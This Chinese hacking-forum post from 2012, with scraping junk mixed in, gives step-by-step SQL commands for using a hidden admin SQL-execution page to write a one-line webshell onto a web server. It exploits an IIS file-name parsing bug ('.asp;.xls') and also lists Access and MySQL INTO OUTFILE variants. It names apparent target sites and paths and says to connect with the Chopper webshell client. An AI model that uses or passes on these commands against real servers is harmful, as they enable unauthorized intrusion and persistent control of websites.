好不容易进了后台,发现啥上传啊。备份啊多木有。
/ n0 Y; m# |- n+ y- Kwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
5 t5 w' _) f& g) I文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,: D/ v! Y/ z; f/ L$ A
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:4 b6 f2 B* z9 f' t; b3 y ]
1.create table cmd (a varchar(50))
+ L/ n, x) L% ^6 O5 ^7 x2.insert into cmd (a) values (‘‘)
; y) a% h- u/ M! W! S# X* a# F3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd' i+ x* H- X O Y: L6 ~% t
(把表cmd的内容导出为物理路径的一个EXCEL文件)
5 ]+ c1 e: g! B. l4.drop table cmd( L" {7 E5 W" o6 D
利用IIS的BUG成功拿到了WEBSHELL。( u% l' }- \+ o: b; G
2 ^5 S( ?( B$ y+ d直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话4 S2 `+ C& o# c
2 r' @ k! J" [5 @& P SQL语句意思解释:1 X* s, D' K( f, t- V
第一句7 h& s: y+ \7 r# V+ [8 ~0 h
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50) q' ?. T2 x% g9 `1 T- Z& ?
+ ?* F( @' d, l s
第二句6 t: B- c$ q3 D5 Q
在表cmd的a字段插入一句话木马
6 U% V: _4 c3 G+ t0 Z; Y- t A 第三句
: U# f& T8 R# J' U1 U 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
* U$ X+ h7 \' {; ?, n' f# }1 z( J
1 [8 F5 w; P4 B, n0 ?0 ` 第四句/ a; g: w* y: C2 q7 V
删除建立的cmd表* [5 n5 U1 O% K: N$ F+ G- |
( W+ F% T1 s' I0 e, Q+ F 以下内容为测试:' G7 ~/ a9 q! i0 P7 W/ L5 u
Access利用后台SQL执行命令功能导出WebShell:0 C. G1 { B, S7 O, q: ? H
这个更简单:
l0 w8 I* u6 `5 y! ~) q [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
( O8 @% r8 d$ [# j/ h& ] 或者
1 i7 ]5 |9 t: e. o, G [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
# ^7 T u; C4 ~& G( T
7 h9 S# u$ Z$ v, f6 X/ U 后台有执行SQL语句功能(vote为已知表段)
" ~! V6 f6 x7 ]! Q 希望对大家有所帮助拿shell的又一个思路
2 U1 ^5 F) p$ ?! @ |
发表于 2012-9-13 17:53:58
收藏
支持
反对